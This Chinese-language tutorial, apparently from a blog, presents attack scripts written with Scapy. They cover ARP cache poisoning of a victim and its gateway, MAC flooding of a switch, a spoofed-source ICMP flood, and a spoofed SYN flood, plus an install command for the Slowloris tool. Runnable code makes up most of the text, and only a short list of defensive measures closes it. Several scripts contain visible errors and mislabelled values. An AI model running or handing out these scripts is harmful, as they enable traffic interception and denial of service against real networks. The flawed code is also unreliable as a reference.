ARP是建立在网络中各个主机互相信任的基础上的,主机接收到ARP应答报文时不会检测该报文的真实性,而直接将报文中的IP和MAC记入其ARP缓存表。如果ARP缓存表中有相同的地址项,则会对其进行更新。由此,攻击者🤺可以向受害主机发送伪ARP应答包,毒化受害主机的ARP缓存表。
kali的IP地址:192.168.12.128 MAC地址为:00:0c:29:c5:a5:bb
目标网关的IP地址:192.168.12.2 MAC地址为:00:50:56:e6:e8:7d
毒化前
# ARP毒化脚本
from scapy.all import *
import re
import time
import sys
import os
import optparse
# 编写ARP毒化函数,对目标主机以及网关不断发送ARP应答包来不断毒化
def poison(targetIP,gatewayIP,ifname):
# 毒化主机的MAC地址
targetMAC = "00:0c:29:c5:a5:bb"
# 网关的MAC地址
gatewayMAC = "00:50:56:e6:e8:7d"
if targetMAC and gatewayMAC:
# 用while持续毒化
while True:
# 对目标主机进行毒化
sendp(Ether(src=lmac,dst=targetMAC)/ARP(hwsrc=lmac,hwdst=targetMAC,psrc=gatewayIP,pdst=targetIP,op=2),iface=ifname,verbose=False)
#对网关进行毒化
sendp(Ether(src=lmac,dst=gatewayMAC)/ARP(hwsrc=lmac,hwdst=gatewayMAC,psrc=targetIP,pdst=gatewayIP,op=2),iface=ifname,verbose=False)
time.sleep(1)
else:
print("目标主机/网关主机IP有误,请检查!")
sys.exit(0)
# 编写main函数,添加相关参数以及开启系统路由转发功能
if __name__ == '__main__':
parser = optparse.OptionParser('usage:python %prog -r targetIP -g gatewayIP -i iface \n\n')
# 添加目标主机参数 -r
parser.add_option('-r','--rhost',dest='rhost',default='192.168.12.1',type ='string',help ='target host')
# 添加网关参数 -g
parser.add_option('-g','--gateway',dest='gateway',default='192.168.1.254',type='string',help='target gateway')
# 添加网卡参数 -i
parser.add_option('-i','--iface',dest='iface',default='eth0',type='string',help='interfaces name')
(options,args) = parser.parse_args()
lmac = get_if_hwaddr(options.iface)
lip = get_if_addr(options.iface)
print("===开始进行ARP毒化===")
try:
poison(options.rhost,options.gateway,options.iface)
except KeyboardInterrupt:
print("===停止ARP毒化")
print("===停止路由转发功能===")
os.system("echo 1 >> /proc/sys/net/ipv4/ip_forward")
os.system("sysct1 net.ipv4.ip_forward")
毒化后
Dos
常用的拒绝服务攻击🤺手段包括:
同步洪流、WinNuke、死亡之PING、Echl攻击、ICMP/SMURF、Finger炸弹、Land攻击、Ping洪流、Rwhod、tearDrop、TARGA3、UDP攻击、OOB等。实际上拒绝服务攻击🤺并不是一个攻击🤺方式,而是指一类具有相似特征的攻击🤺方式。黑客可能会利用TCP/IP协议层中的数据链路层、网络层、传输层和应用层各种协议漏洞发起拒绝服务攻击🤺。
数据链路层Dos-MAC泛洪攻击
当路由器接收到包含随机生成的IP地址和MAC地址的数据包时,交换机查询CAM,若不存在该信息,就会不断进行记录。短时间内’大量请求会导致CAM被填满,失去交换机原有的功能。
from scapy.all import *
import optparse
def attack(interface):
pkt =Ether(src=RandMAC(),dst=RandMAC())/IP(src=RandIP(),dst=RandIP())/ICMP()
sendp(pkt,iface=interface)
def main():
parser =optparse.OptionParser("%prog "+"-i interface")
parser.add_option('-i',dest='interface',default='eth0',type='string',help='Interface')
(options,args)=parser.parse_args()
interface = options.interface
try:
while True:
attack(interface)
except KeyboardInterrupt:
print('--------------------')
print('Finished!')
if __name__ =='__main__':
main()
wireshark
网络层Dos-死亡之Ping
控制多个僵尸主机一同向目标主机发送数据时,会出现"死亡之ping",使目标主机岩机.
import sys
from scapy.all import *
def start(argv):
if len(sys.argv)<2:
print(sys.argv[0]+" <target_ip>")
sys.exit(0)
psrc = "6.6.6.6"
while True:
pdst = sys.argv[1]
send(IP(src=psrc,dst=pdst)/ICMP())
s
if __name__ == '__main__':
# 定义异常
try:
start(sys.argv[1:])
except KeyboardInterrupt:
print("interrupted by user,killing all threads....")
传输层Dos-SYN拒绝服务攻击
import sys
from scapy.all import *
def start(argv):
if len(sys.argv)<2:
print(sys.argv[0] +" <target_ip")
sys.exit(0)
psrc = '6.6.6.6'
while True:
pdst =sys.argv[1]
send(IP(src=psrc,dst=pdst)/TCP(dport=443,flag='S'))
if __name__ == '__main__':
# 定义异常
try:
start(sys.argv[1:])
except KeyboardInterrupt:
print("interrupted by user, killing all threads......")
应用层Dos-Slowloris攻击
Slowloris攻击
以极低的速度向服务器发送HTTP请求。由于WebServer对于并发的连接数都有一定的上限,因此若恶意地占用这些连接不释放,那么WebServe的所有连接都将被恶意连接占用,从而无法接受新的请求,导致拒绝服务。
pip install slowloris
安装
防御策略
1️⃣关闭不需要的服务和端口,实现服务最小化,让服务器提供专门服务。
2️⃣安装查杀病毒的软硬件产品,及时更新病毒库。尽量避免因为软件漏洞而引起的拒绝服务,定期扫描现有的主机和网络节点,对安全漏洞和不规范的安全配置进行及时整改,对先前的漏洞及时打补丁。
3️⃣经常检测网络和主机的脆弱性,查看网上漏洞数据库,以减少或避免主机成为肉鸡的可能性。
4️⃣建立多节点的负载均衡,配备高于业务需求的带宽,建立多个网络出口,提高服务器的运算能力。